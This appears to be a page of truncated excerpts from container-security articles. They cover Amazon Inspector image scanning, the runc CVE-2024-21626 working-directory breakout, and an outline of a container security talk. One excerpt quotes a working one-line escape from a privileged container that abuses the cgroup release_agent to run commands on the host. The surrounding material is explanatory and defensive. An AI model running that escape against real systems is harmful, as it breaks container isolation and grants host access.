Hello, this is 近 from the Cybersecurity Promotion Department, Corporate Headquarters. In June 2024, it was announced that Amazon Inspector now supports container image scanning in GitHub Actions. I expect many people already use Trivy for vulnerability scanning of container images, but I tried scanning with Inspector as another option. It can also do more than scan container images: it can statically analyze language package version files and Dockerfiles, so I tried that as well. How it works / Unpacking the action / Scanning files in a repository / Trying it out / Summary page results / Findings in CSV format / Findings in JSON format / Findings in Markdown format / When no vulnerabilities are detected / Scanning a container image / Summary page
runc working directory breakout (CVE-2024-21626) by Mohit Gupta Snyk recently identified a flaw in runc <= 1.1.11, CVE-2024-21626. This issue effectively allowed an attacker to gain filesystem access to the underlying host's OS, which could be used to gain privileged access to the host. This has an impact on orchestration based environments which use runc, such as Kubernetes. An attacker able to d
2021/06/22 Kubernetes Novice Tokyo #11 Break Through the Container!! ~The Basics of the Basics of Container Security~
Source: https://twitter.com/_fel1x/status/1151487051986087936 d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o — Felix Wilhelm (@_fel1x) July 17, 2019 With a privileged ( CAP_SYS_ADMIN ) container, cgr
Outline: Virtualization / Differences between hypervisor-based and hosted virtualization / Where are containers used? / Container security / Container implementation / Container pros and cons / Pros / Cons / How are containers implemented? / Containers are processes / Building your own container by Haconiwa / First, since a container is a process, we start by forking. / Isolate namespaces / Configure cgroups / Configure capabilities / Attacks on containers / Container security mechanisms / Attack Surfaces / Swiss cheese model / AppArmor / /sys/kernel/uevent_helper / /proc/sysrq-trigger / Applying AppArmor / Protection with AppArmor / seccomp / secco